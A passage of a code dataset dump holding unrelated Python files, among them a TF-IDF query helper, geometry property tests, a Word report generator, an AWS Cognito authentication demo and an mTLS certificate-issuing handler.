 Have a nice day!')\n","sub_path":"students/kevin/session06/mailroom4.py","file_name":"mailroom4.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354507009","text":"import numpy as np\nimport os, sys\nfrom .search import *\nfrom .inverted_matrix import *\nfrom .postings import *\nfrom .helpers import tokenize_and_stem\nfrom collections import defaultdict\nfrom scipy.sparse.linalg import svds\nfrom nltk.stem import PorterStemmer\n\ndef tfidf_matrix(tf,idf,companies,word_in,k=3):\n\tps = PorterStemmer()\n\tindex_to_word = list(idf.keys())\n\tfor company in companies:\n\t\tif ps.stem(company) in index_to_word:\n\t\t\tindex_to_word.remove(ps.stem(company))\n\tword_to_index = {index_to_word[i]:i for i in range(len(index_to_word))}\n\tindex_to_companies = companies\n\tcompany_to_index = {index_to_companies[i]:i for i in range(len(index_to_companies))}\n\tn_words = len(index_to_word)\n\tn_comps = len(companies)\n\tmat = np.zeros((n_words,n_comps))\n\tfor word in index_to_word:\n\t\tfor comp, freq in tf[word]:\n\t\t\tmat[word_to_index[word]][company_to_index[comp]] = freq * idf[word]\n\twords_compressed, _, docs_compressed = svds(mat, k=int(n_comps/2))\n\tdocs_compressed = docs_compressed.transpose()\n\n\t\n\t# check emptiness with len(): sims starts as a list but becomes an\n\t# ndarray, and comparing an ndarray against [] is ambiguous\n\tsims = []\n\tfor word in word_in:\n\t\tif word in word_to_index:\n\t\t\tif len(sims) == 0:\n\t\t\t\tsims = words_compressed.dot(words_compressed[word_to_index[word],:])\n\t\t\telse:\n\t\t\t\tsims = np.add(sims,words_compressed.dot(words_compressed[word_to_index[word],:]))\n\tif len(sims):\n\t\tasort = np.argsort(-sims)[:k+1]\n\t\treturn [(index_to_word[i],sims[i]/sims[asort[0]]) for i in asort[1:]]\n\telse:\n\t\treturn []","sub_path":"app/backend/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631443039","text":"import sys\nimport codecs\n\nPYTHON_VERSION = sys.version_info.major\nSTRINGTYPE = str if PYTHON_VERSION == 3 else basestring\nINPUTFUNC = input if PYTHON_VERSION == 3 else raw_input\nOPENER = open if PYTHON_VERSION == 3 else codecs.open\n\n# quicker access to search, exclude, show types\nfrom itertools import product\n_starts = ['M', 'N', 'B', 'G', 'D', 'H']\n\n_ends = ['W', 'L', 'I', 'S', 'P', 'X', 'R', 'F']\n_others = ['A', 'ANY', 'ANYWORD', 'C', 'SELF', 'V', 'K', 'T']\n_prod = list(product(_starts, _ends))\n_prod = [''.join(i) for i in _prod]\n_letters = sorted(_prod + _starts + _ends + _others)\n\n_adjacent_start = ['A{}'.format(i) for i in range(1, 9)] + \\\n ['Z{}'.format(i) for i in range(1, 9)]\n\n_adjacent = [''.join(i) for i in list(product(_adjacent_start, _prod))]\n\nLETTERS = sorted(_letters + _adjacent)\n\n# translating search values into words\ntransshow = {'f': 'Function',\n 'l': 'Lemma',\n 'r': 'Distance from root',\n 'w': 'Word',\n 't': 'Trees',\n 'i': 'Index',\n 'n': 'N-grams',\n 'p': 'POS',\n 'x': 'Word class',\n 's': 'Sentence index'}\n\ntransobjs = {'g': 'Governor',\n 'd': 'Dependent',\n 'm': 'Match',\n 'h': 'Head'}\n\n# modify this if your conll-style data is different from what is provided by the\n# parser plus post-processing. data must start with 's' for sentence index and 'i'\n# for token index.
 after that, you can have whichever fields you like, and should \n# be able to access them using normal corpkit syntax.\n\n# 'd', for deps, is a comma-sep string of dependent token indices\n\n# 'c', for coref, has an arbitrary number representing a dependency chain. the\n# head of a mention is marked with an asterisk.\n\n# y and z are left as custom fields, not really in use now, but theoretically\n# they are searchable\n\n# default: sent, index, word, lem, pos, ner, gov, func, deps, coref, custom * 3\nCONLL_COLUMNS = ['s', 'i', 'w', 'l', 'p', 'n', 'g', 'f', 'd', 'c', 'y', 'z']\n\n# what the longest possible speaker ID is. this prevents huge lines with colons\n# from getting matched unintentionally\nMAX_SPEAKERNAME_SIZE = 40\n\n\nREPEAT_PARSE_ATTEMPTS = 3\n","sub_path":"corpkit/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1855383","text":"from app.database.engine import engine\nfrom sqlalchemy.sql import text\n\nconnect = engine.connect()\n\ndef get_enums(enum):\n stmt = text(\n \"SELECT e.enumlabel as name FROM pg_enum e JOIN pg_type t ON e.enumtypid = t.oid WHERE t.typname = :x\"\n )\n query = stmt.bindparams(x=enum)\n result = connect.execute(query)\n labels = list()\n for item in result:\n labels.extend(item)\n return labels\n","sub_path":"app/database/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157487647","text":"# -*- coding:utf-8 -*-\n'''\n@author:coyote\n@datetime:2019/1/25 22:07\n@file: log.py\n@function:\n'''\nimport datetime\nimport csv\n\n\n# Log management system\nclass LogMangerSys:\n def __init__(self):\n self.buy_log = []\n\n def get_log_time(self, format):\n \"\"\"\n Get the current time for writing a log entry\n :param format: date format string, e.g. \"%Y%m%d\"\n :return:\n \"\"\"\n log_time = datetime.datetime.now().strftime(format)\n return log_time\n\n def write_log_append_csv(self, file_path, file_name, header, data):\n \"\"\"\n Append log rows to a CSV file\n :param file_path: directory of the file\n :param file_name: name of the file\n :param header: column headers\n :param data: log rows\n :return:\n \"\"\"\n # timestamp used in the log file name\n log_time = self.get_log_time(\"%Y%m%d\")\n print(\"log_time:{}\".format(log_time))\n # file name format: file_path + file_name + log_time\n # name of the output CSV file\n new_file_name = file_path + file_name + \"_\" + log_time + \".csv\"\n with open(new_file_name, 'a', newline='', encoding='utf-8') as f:\n writer = csv.DictWriter(f, header)\n # writer.writeheader()\n writer.writerows(data)\n\n def buy_log_manager(self, user_id, money, *items):\n \"\"\"\n Write a user's purchase log to file\n :param user_id: user id\n :param money: amount spent\n :param items: purchased items, format: [{\"user_id\":\"user_id1\",\"money\":20,\"items\":(items1,item2......)}]\n :return:\n \"\"\"\n buy_log = {\"user_id\": user_id, \"money\": money, \"items\": items}\n self.buy_log.append(buy_log)\n print(buy_log)\n # -----------------V4 start------------------\n\n item_str = \"\" # items joined with '|', e.g. 老干妈|王中王\n for item in items:\n if item_str == \"\":\n item_str = item\n else:\n item_str += '|' + item\n file_path = \"\"\n file_name = \"user_buy_log\"\n header = [\"user_id\", \"money\", \"item\"]\n buy_log = [{\"user_id\": user_id, \"money\": money, \"item\": item_str}]\n # write the log rows to the CSV file via our own helper\n self.write_log_append_csv(file_path, file_name, header, 
buy_log)\n","sub_path":"day7/infrastructure/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"543722156","text":"# 16.1 Number Swapper\n\"\"\"\nWrite a function to swap a number in place (that is, without using temporary variables).\n\"\"\"\n\n# We can simply add up the two numbers which allow us to switch variables by subtracting.\n\ndef number_swapper(a, b):\n a = a + b\n b = a - b\n a = a - b\n return a, b\n\n# There must be a way to do this with bit manipulation as well.\n\n\n# Function Call Here\na = 5\nb = 9\nprint(a, b)\na, b = number_swapper(a, b)\nprint(a, b)","sub_path":"Coding Challenges/Exercise Problems/H Moderate/16.1 Number Swapper.py","file_name":"16.1 Number Swapper.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610108113","text":"from hypothesis import given\nfrom orient.planar import (Relation,\n segment_in_multipolygon,\n segment_in_multisegment,\n segment_in_segment)\n\nfrom clipping.planar import intersect_multisegment_with_multipolygon\nfrom tests.utils import (MultipolygonWithMultisegment,\n is_multisegment,\n reverse_multipolygon,\n reverse_multipolygon_borders,\n reverse_multipolygon_holes,\n reverse_multipolygon_holes_contours,\n reverse_multisegment,\n reverse_multisegment_endpoints,\n to_sorted_segment)\nfrom . import strategies\n\n\n@given(strategies.multipolygons_with_multisegments)\ndef test_basic(multipolygon_with_multisegment: MultipolygonWithMultisegment\n ) -> None:\n multipolygon, multisegment = multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n multipolygon)\n\n assert is_multisegment(result)\n\n\n@given(strategies.rational_multipolygons_with_multisegments)\ndef test_properties(multipolygon_with_multisegment\n : MultipolygonWithMultisegment) -> None:\n multipolygon, multisegment = multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n multipolygon)\n\n assert all(segment_in_multisegment(segment, multisegment)\n in (Relation.EQUAL, Relation.COMPONENT)\n for segment in result.segments)\n assert all(segment_in_multipolygon(segment, multipolygon)\n in (Relation.COMPONENT, Relation.ENCLOSED, Relation.WITHIN)\n for segment in result.segments)\n assert all(to_sorted_segment(segment) in result.segments\n # in case of cross\n or any(segment_in_segment(result_segment, segment)\n is Relation.COMPONENT\n for result_segment in result.segments)\n for segment in multisegment.segments\n if (segment_in_multipolygon(segment, multipolygon)\n in (Relation.CROSS, Relation.COMPONENT, Relation.ENCLOSED,\n Relation.WITHIN)))\n\n\n@given(strategies.empty_multipolygons_with_multisegments)\ndef test_left_absorbing_element(empty_multipolygon_with_multisegment\n : MultipolygonWithMultisegment) -> None:\n empty_multipolygon, multisegment = empty_multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n empty_multipolygon)\n\n assert not result.segments\n\n\n@given(strategies.multipolygons_with_empty_multisegments)\ndef test_right_absorbing_element(multipolygon_with_empty_multisegment\n : MultipolygonWithMultisegment) -> None:\n multipolygon, empty_multisegment = multipolygon_with_empty_multisegment\n\n result = intersect_multisegment_with_multipolygon(empty_multisegment,\n multipolygon)\n\n assert not 
result.segments\n\n\n@given(strategies.multipolygons_with_multisegments)\ndef test_reversals(multipolygon_with_multisegment: MultipolygonWithMultisegment\n ) -> None:\n multipolygon, multisegment = multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n multipolygon)\n\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon_borders(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon_holes(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon_holes_contours(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n reverse_multisegment(multisegment), multipolygon)\n assert result == intersect_multisegment_with_multipolygon(\n reverse_multisegment_endpoints(multisegment), multipolygon)\n","sub_path":"tests/planar_tests/test_intersect_multisegment_with_multipolygon.py","file_name":"test_intersect_multisegment_with_multipolygon.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461132051","text":"# Global import\nfrom docx import Document\nfrom docx.shared import Inches, Pt, RGBColor\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.enum.table import WD_ALIGN_VERTICAL, WD_TABLE_ALIGNMENT\nfrom pandas import Timestamp\n# Local import\n\n\nclass Documents(object):\n\n def __init__(self, path, driver):\n self.path = path\n self.driver = driver\n self.document = None\n\n def save_document(self, name):\n if self.document is not None:\n self.document.save(self.driver.join(self.path, name))\n else:\n raise ValueError('Document is None')\n\n\nclass WordDocument(Documents):\n def __init__(self, path, driver, document_settings):\n Documents.__init__(self, path, driver)\n \n # Create document \n self.document = Document()\n \n # Set document global parameter\n self.field_size = document_settings.get('field_size', 40)\n\n # Set margin\n sec = self.document.sections[0]\n sec.top_margin = Inches(document_settings.get('top_margin', 1.))\n sec.left_margin = Inches(document_settings.get('left_margin', 0.5))\n sec.right_margin = Inches(document_settings.get('right_margin', 0.5))\n\n # Set font type\n style = self.document.styles['Normal']\n font = style.font\n font.name = document_settings.get('font_name', 'DejaVu Sans Mono')\n font.size = Pt(int(document_settings.get('font_size', 8)))\n\n def save_document(self, name):\n\n # Add footer to document\n self.add_footer('Edition du document: {}'.format(Timestamp.now().date()))\n Documents.save_document(self, name)\n\n def add_title(self, title, font_size=12, text_align='center', color='000000', left_indent=0.,\n space_before=0.12, space_after=0.12):\n\n h = self.document.add_heading(title, 1)\n h.paragraph_format.left_indent = Inches(left_indent)\n\n if text_align == 'center':\n h.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n elif text_align == 'left':\n h.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.LEFT\n\n if text_align == 'right':\n h.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\n\n h.style.font.bold = True\n h.style.font.color.rgb = RGBColor.from_string(color)\n h.style.font.size = Pt(font_size)\n h.paragraph_format.space_before = Inches(space_before)\n h.paragraph_format.space_after = 
Inches(space_after)\n\n def add_table(self, df, index_column=-1, left_indent=0.15):\n\n # Load values from dataframe\n l_col_names = df.columns\n l_values = [[row[c] for c in l_col_names] for _, row in df.iterrows()]\n\n table = self.document.add_table(rows=1, cols=len(l_col_names))\n table.style.paragraph_format.left_indent = Inches(left_indent)\n table.alignment = WD_TABLE_ALIGNMENT.CENTER\n\n # Build header row\n row = table.rows[0]\n l_cells = row.cells\n for cell, name in zip(l_cells, l_col_names):\n cell.text = name\n cell.paragraphs[0].runs[0].bold = True\n cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n cell.vertical_alignment = WD_ALIGN_VERTICAL.CENTER\n\n # Build body rows\n for l_row_values in l_values:\n l_cells = table.add_row().cells\n for i, (cell, name) in enumerate(zip(l_cells, l_row_values)):\n cell.text = name if isinstance(name, (str, unicode)) else str(name)\n cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n # vertical alignment takes a WD_ALIGN_VERTICAL member, as in the header row\n cell.vertical_alignment = WD_ALIGN_VERTICAL.CENTER\n if i == index_column:\n cell.paragraphs[0].runs[0].bold = True\n\n def add_field(self, title, value, left_indent=0., space_before=0.06, space_after=0.):\n\n # create and format paragraph\n p = self.document.add_paragraph()\n p.paragraph_format.left_indent = Inches(left_indent)\n p.paragraph_format.space_before = Inches(space_before)\n p.paragraph_format.space_after = Inches(space_after)\n tab = ' ' + \" \".join(['.'] * ((self.field_size - len(title)) / 2)) + ' ' * (len(title) % 2)\n\n # Add info\n p.add_run(title).bold = True\n p.add_run(tab)\n p.add_run(value if isinstance(value, (str, unicode)) else str(value))\n\n def add_simple_paragraph(self, l_runs, break_run=False, left_indent=0., space_before=0.06, space_after=0.,\n bold=False, alignment=None):\n\n p = self.document.add_paragraph()\n\n if alignment == 'center':\n p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n elif alignment == 'right':\n p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\n\n p.paragraph_format.left_indent = Inches(left_indent)\n p.paragraph_format.space_before = Inches(space_before)\n p.paragraph_format.space_after = Inches(space_after)\n\n for text in l_runs:\n r = p.add_run(text)\n r.bold = bold\n\n if break_run:\n r.add_break()\n\n def add_footer(self, text):\n footer = self.document.sections[0].footer\n p = footer.paragraphs[0]\n p.alignment = WD_ALIGN_PARAGRAPH.CENTER\n r = p.add_run(text)\n r.add_break()\n p.add_run('CASOE')\n","sub_path":"facile/core/document_generator.py","file_name":"document_generator.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460667126","text":"#!/usr/bin/env python3\n# Demonstrates the use of Python to work with Cognito.\n# Create a new user, log in, check tokens and call an API.\n# The purpose was to learn about Cognito. Security has been\n# circumvented in the interest of keeping it simple.\n# Notably, the authentication procedure uses the most insecure\n# method.
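 USER_PASSWORD_AUTH sends the password itself rather than an SRP proof.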
 This code is not intended for use in production.\n#\n# https://www.neant.ro/aws/working-with-cognito-and-api-gateway-in-python.html\n\nimport argparse\nimport boto3\nimport requests\nfrom botocore.exceptions import ClientError\nfrom pprint import pprint\nfrom jose import jwt, jwk\nfrom jose.utils import base64url_decode\n\n\ndef sign_up():\n cidp = boto3.client('cognito-idp')\n\n try:\n # Add user to pool\n sign_up_response = cidp.sign_up(\n ClientId=deadpool['app_client_id'],\n Username=deadpool['username'],\n Password=deadpool['password'],\n UserAttributes=[{'Name': 'email',\n 'Value': deadpool['email']}])\n pprint(sign_up_response)\n print(\" Confirming user...\")\n # Use Admin powers to confirm user. Normally the user would\n # have to provide a code or click a link received by email\n confirm_sign_up_response = cidp.admin_confirm_sign_up(\n UserPoolId=deadpool['user_pool_id'],\n Username=deadpool['username'])\n pprint(confirm_sign_up_response)\n except ClientError as err:\n # Probably user already exists\n print(err)\n\n\ndef init_auth():\n # Log in the user we just created\n global deadpool\n cidp = boto3.client('cognito-idp')\n\n # This is less secure, but simpler\n response = cidp.initiate_auth(\n AuthFlow='USER_PASSWORD_AUTH',\n AuthParameters={\n 'USERNAME': deadpool['username'],\n 'PASSWORD': deadpool['password']},\n ClientId=deadpool['app_client_id'])\n print(\"----- Log in response -----\")\n pprint(response)\n print(\"---------------------------\")\n # AWS official docs on using tokens with user pools:\n # https://amzn.to/2HbmJG6\n # If authentication was successful we got three tokens\n deadpool['jwt_access_token'] = \\\n response['AuthenticationResult']['AccessToken']\n deadpool['jwt_id_token'] = \\\n response['AuthenticationResult']['IdToken']\n deadpool['jwt_refresh_token'] = \\\n response['AuthenticationResult']['RefreshToken']\n\n\ndef check_token(token):\n # AWS docs on verifying tokens:\n # https://amzn.to/2vUwFx7\n # Decode token header\n token_header = jwt.get_unverified_header(token)\n print('Token header:')\n pprint(token_header)\n # Decode token payload\n token_claims = jwt.get_unverified_claims(token)\n print('Token claims:')\n pprint(token_claims)\n # Verify signature, step by step.\n # Original (and better) code in this gist: https://bit.ly/2E3fAFP\n print('Checking key manually')\n # First, get the JSON Web Key Set, which contains two public\n # keys corresponding to the two private keys that could\n # have been used to sign the token.\n r = requests.get(deadpool['jwks_url'])\n if r.status_code == 200:\n jwks = r.json()\n else:\n # a bare string cannot be raised in Python 3, so wrap it in an exception\n raise RuntimeError('Did not retrieve JWKS, got {}'.format(r.status_code))\n # The token header contains a field named 'kid', which stands\n # for Key ID. The JWKS also contains two 'kid' fields, one for\n # each key. 
The 'kid' in the header tells us which public key\n # must be used to verify the signature.\n kid = token_header['kid']\n # Search the JWKS for the proper public key\n key_index = -1\n for i in range(len(jwks['keys'])):\n if kid == jwks['keys'][i]['kid']:\n key_index = i\n break\n if key_index == -1:\n print('Public key not found, can not verify token')\n else:\n # Convert public key\n public_key = jwk.construct(jwks['keys'][key_index])\n # Get claims and signature from token\n claims, encoded_signature = token.rsplit('.', 1)\n # Verify signature\n decoded_signature = base64url_decode(\n encoded_signature.encode('utf-8'))\n if not public_key.verify(claims.encode(\"utf8\"),\n decoded_signature):\n print('Signature verification failed')\n else:\n print('Signature successfully verified')\n\n\ndef decode_token(token):\n # Executing decode() on the token will return the header or raise\n # an error if checking the signature or one of the claims fails.\n # See https://python-jose.readthedocs.io/en/latest/jwt/api.html\n pprint(jwt.decode(\n token,\n requests.get(deadpool['jwks_url']).json()))\n\n\ndef call_api(token):\n headers = {'Authorization': token}\n url = deadpool['api_url']\n r = requests.post(url, headers=headers)\n print(r.status_code)\n print(r.text)\n\n\nif __name__ == '__main__':\n optparser = argparse.ArgumentParser(description='Cognito demo')\n optparser.add_argument('-p',\n '--profile',\n help='aws credentials profile')\n args = optparser.parse_args()\n\n if args.profile:\n boto3.setup_default_session(profile_name=args.profile)\n\n global deadpool # Yes, global. This isn't production code\n deadpool = {}\n # Put in your own values. These are fake\n deadpool['user_pool_id'] = 'eu-central-1_a5NXAWJDK'\n deadpool['region'] = 'eu-central-1'\n deadpool['jwks_url'] = 'https://cognito-idp.{}.amazonaws.com/{}/' \\\n '.well-known/jwks.json'.format(\n deadpool['region'],\n deadpool['user_pool_id'])\n deadpool['app_client_id'] = '3rb9mhrfqme2lbjepb353jrlml'\n deadpool['app_client_secret'] = \\\n 'https://stackoverflow.com/questions/1306550/' + \\\n 'calculating-a-sha-hash-with-a-string-secret-key-in-python'\n deadpool['username'] = 'cognito-py-demo'\n deadpool['password'] = 'D0lphins!'\n deadpool['email'] = 'cognito-py-demo@antispam.com'\n deadpool['api_url'] = 'https://' \\\n '4a48x6598i.execute-api.eu-central-1.amazonaws.com/prod/insert-login'\n\n print('Signing up...')\n sign_up()\n print('Authenticating...')\n init_auth()\n print('\"Manually\" check access token...')\n check_token(deadpool['jwt_id_token'])\n print('Decode token, also runs checks...')\n decode_token(deadpool['jwt_access_token'])\n print('POST to API...')\n call_api(deadpool['jwt_id_token'])\n","sub_path":"python-user-mgmt/cognito-functions-test.py","file_name":"cognito-functions-test.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"589380917","text":"import os\nfrom configparser import ConfigParser\nimport json\n\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.x509.oid import NameOID\n\nfrom cert_processor import CertProcessor\nfrom cert_processor import CertProcessorInvalidSignatureError\nfrom cert_processor import CertProcessorKeyNotFoundError\nfrom cert_processor import 
CertProcessorMismatchedPublicKeyError\nfrom cert_processor import CertProcessorUntrustedSignatureError\nfrom cert_processor import CertProcessorNotAdminUserError\nfrom cert_processor import CertProcessorNoPGPKeyFoundError\nfrom logger import logger\nfrom sync import Sync\nfrom utils import error_response\nfrom utils import write_sig_to_file\nfrom utils import get_config_from_file\n\n\nclass GPGKeyNotFoundException(Exception):\n pass\n\n\nclass Handler:\n def __init__(self, config=None):\n if config is None:\n config = get_config_from_file(\"config.ini\")\n self.config = config\n # Seed the trust stores\n Sync(self.config).seed()\n self.cert_processor = CertProcessor(config)\n\n def create_cert(self, body):\n \"\"\"Create a certificate.\"\"\"\n lifetime = int(body[\"lifetime\"])\n min_lifetime = int(self.config.get(\"mtls\", \"min_lifetime\", fallback=60))\n max_lifetime = int(self.config.get(\"mtls\", \"max_lifetime\", fallback=0))\n if lifetime < min_lifetime:\n logger.info(\n \"User requested lifetime less than minimum. {} < {}\".format(\n lifetime, min_lifetime\n )\n )\n return error_response(\n \"lifetime must be greater than {} seconds\".format(min_lifetime)\n )\n if max_lifetime != 0:\n if lifetime > max_lifetime:\n logger.info(\n \"User requested lifetime greater than maximum. {} < {}\".format(\n lifetime, max_lifetime\n )\n )\n return error_response(\n \"lifetime must be less than {} seconds\".format(max_lifetime)\n )\n csr_str = body[\"csr\"]\n csr = self.cert_processor.get_csr(csr_str)\n if csr is None:\n return error_response(\"Could not load CSR\")\n try:\n logger.info(\"create_cert: get csr_public_bytes\")\n csr_public_bytes = csr.public_bytes(serialization.Encoding.PEM)\n logger.info(\"create_cert: write to temp sig file\")\n sig_path = write_sig_to_file(body[\"signature\"])\n logger.info(\"create_cert: get fingerprint\")\n fingerprint = self.cert_processor.verify(csr_public_bytes, sig_path)\n logger.info(\"create_cert: remove sig file\")\n os.remove(sig_path)\n except CertProcessorUntrustedSignatureError as e:\n logger.info(\"Unauthorized: {}\".format(e))\n return error_response(\"Unauthorized\", 403)\n except CertProcessorInvalidSignatureError:\n logger.info(\"Invalid signature in CSR.\")\n return error_response(\"Invalid signature\", 401)\n except Exception as e:\n logger.critical(\"Unknown Error: {}\".format(e))\n return error_response(\"Internal Server Error\", 500)\n if csr is None:\n logger.info(\"Invalid CSR.\")\n return error_response(\"Invalid CSR\")\n cert = None\n try:\n logger.info(f\"create_cert: generating certificate for: {fingerprint}\")\n cert = self.cert_processor.generate_cert(csr, lifetime, fingerprint)\n logger.info(f\"create_cert: sending certificate to client for: {fingerprint}\")\n return json.dumps({\"cert\": cert.decode(\"UTF-8\")}), 200\n except CertProcessorKeyNotFoundError:\n logger.critical(\"Key missing. 
Service not properly initialized\")\n return error_response(\"Internal Error\")\n except CertProcessorMismatchedPublicKeyError:\n logger.error(\"CSR Public Key does not match found certificate.\")\n return error_response(\"Internal Error\")\n except CertProcessorNotAdminUserError:\n logger.error(\n \"User {} is not an admin and attempted \".format(fingerprint)\n + \"to generate a certificate they are not allowed to generate.\"\n )\n return error_response(\"Invalid Request\", 403)\n except CertProcessorNoPGPKeyFoundError:\n logger.info(\"PGP Key not found.\")\n return error_response(\"Unauthorized\", 401)\n except Exception as e:\n logger.critical(f\"Unhandled Exception: {e}\")\n return error_response(\"Internal Server Error\", 500)\n\n def revoke_cert(self, body):\n \"\"\"\n A user should be able to revoke their own certificate. An admin should\n be able to revoke the certificate of any user.\n\n Args:\n body: A dictionary from the JSON input.\n\n Returns:\n (json, int): a tuple of the json response and http status code.\n \"\"\"\n is_admin = False\n fingerprint = None\n sig_path = write_sig_to_file(body[\"signature\"])\n try:\n fingerprint = self.cert_processor.admin_verify(\n json.dumps(body[\"query\"]).encode(\"UTF-8\"), sig_path\n )\n is_admin = True\n logger.info(\n \"Admin {adminfp} revoking certificate with query {query}\".format(\n adminfp=fingerprint, query=json.dumps(body[\"query\"])\n )\n )\n os.remove(sig_path)\n except (CertProcessorInvalidSignatureError, CertProcessorUntrustedSignatureError):\n try:\n fingerprint = self.cert_processor.verify(\n json.dumps(body[\"query\"]).encode(\"UTF-8\"), sig_path\n )\n logger.info(\n \"User {userfp} revoking certificate with query {query}\".format(\n userfp=fingerprint, query=json.dumps(body[\"query\"])\n )\n )\n os.remove(sig_path)\n except (\n CertProcessorInvalidSignatureError,\n CertProcessorUntrustedSignatureError,\n ):\n os.remove(sig_path)\n return error_response(\"Unauthorized\", 403)\n\n certs = self.cert_processor.storage.get_cert(**body[\"query\"])\n if certs is None:\n return error_response(\"No Cert to revoke\")\n for cert in certs:\n cert = x509.load_pem_x509_certificate(\n str(cert).encode(\"UTF-8\"), backend=default_backend()\n )\n self.cert_processor.revoke_cert(cert.serial_number)\n return json.dumps({\"msg\": \"success\"}), 200\n\n def add_user(self, body, is_admin=False):\n \"\"\"Add a user or admin.\"\"\"\n fingerprint = None\n sig_path = write_sig_to_file(body[\"signature\"])\n try:\n fingerprint = self.cert_processor.admin_verify(\n body[\"fingerprint\"].encode(\"UTF-8\"), sig_path\n )\n except (CertProcessorInvalidSignatureError, CertProcessorUntrustedSignatureError):\n os.remove(sig_path)\n logger.error(\n \"Invalid signature on adding fingerprint: {fp}\".format(\n fp=body[\"fingerprint\"]\n )\n )\n return error_response(\"Unauthorized\", 403)\n # Remove signature file\n os.remove(sig_path)\n\n fingerprint = body[\"fingerprint\"]\n\n try:\n if is_admin:\n has_user = self.has_user(self.cert_processor.admin_gpg, fingerprint)\n if not has_user:\n logger.info(\n \"Admin {adminfp} adding admin user {userfp}\".format(\n adminfp=fingerprint, userfp=body[\"fingerprint\"]\n )\n )\n # Add a user to the admin trust store\n self.add_and_trust_user(self.cert_processor.admin_gpg, fingerprint)\n\n has_user = self.has_user(self.cert_processor.user_gpg, fingerprint)\n\n if not has_user:\n # Add the user to the user trust store\n logger.info(\n \"Admin {adminfp} adding admin user {userfp}\".format(\n adminfp=fingerprint, 
userfp=body[\"fingerprint\"]\n )\n )\n self.add_and_trust_user(self.cert_processor.user_gpg, fingerprint)\n return json.dumps({\"msg\": \"success\"}), 201\n except GPGKeyNotFoundException:\n return (\n json.dumps({\"msg\": \"Key not found on keyserver. Could not import\"}),\n 422,\n )\n\n def has_user(self, gpg, fingerprint):\n keys = gpg.list_keys(keys=fingerprint)\n if len(keys) == 0:\n return False\n return True\n\n def add_and_trust_user(self, gpg, fingerprint):\n # use the gpg argument so admin keys land in the admin store\n # instead of always going to the user store\n result = gpg.recv_keys(\n self.config.get(\"gnupg\", \"keyserver\", fallback=\"keyserver.ubuntu.com\"),\n fingerprint,\n )\n if result.count is None or result.count == 0:\n raise GPGKeyNotFoundException()\n gpg.trust_keys([fingerprint], \"TRUST_ULTIMATE\")\n\n def remove_user(self, body, is_admin=False):\n \"\"\"Remove a user or admin.\"\"\"\n fingerprint = None\n sig_path = write_sig_to_file(body[\"signature\"])\n try:\n fingerprint = self.cert_processor.admin_verify(\n body[\"fingerprint\"].encode(\"UTF-8\"), sig_path\n )\n logger.info(\n \"Admin {adminfp} removing user {userfp}\".format(\n adminfp=fingerprint, userfp=body[\"fingerprint\"]\n )\n )\n except (CertProcessorInvalidSignatureError, CertProcessorUntrustedSignatureError):\n os.remove(sig_path)\n logger.error(\n \"Invalid signature on removing fingerprint: {fp}\".format(\n fp=body[\"fingerprint\"]\n )\n )\n return error_response(\"Unauthorized\", 403)\n # Remove signature file\n os.remove(sig_path)\n\n if is_admin:\n # Remove the user from the admin trust store\n self.cert_processor.admin_gpg.delete_keys(body[\"fingerprint\"])\n\n # Remove the user from the user trust store\n self.cert_processor.user_gpg.delete_keys(body[\"fingerprint\"])\n return json.dumps({\"msg\": \"success\"}), 201\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":10731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193441233","text":"\"\"\"Python Exercise 083: Write a program where the user types in any expression\nthat uses parentheses.
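 For example, '(a(b)c)' is balanced while ')(' is not.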
